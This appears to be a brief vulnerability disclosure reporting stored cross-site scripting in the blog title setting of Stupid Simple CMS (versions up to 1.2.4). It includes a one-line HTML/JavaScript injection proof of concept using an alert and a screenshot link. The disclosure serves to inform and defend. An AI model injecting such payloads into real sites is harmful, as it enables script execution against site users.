product: Stupid Simple CMS ( Blogger )
download link: https://github.com/codelyfe/Stupid-Simple-CMS
version:<=1.2.4
There is Cross-Site Scripting (XSS) vulnerability within the blog title of the settings.
poc:
"><img src=1 onerror=alert(1)>
successed
![2](https://github.com/Xin246/cms/assets/160984304/027d9d2d-dd46-4467-b5d2-6ca2b578f762)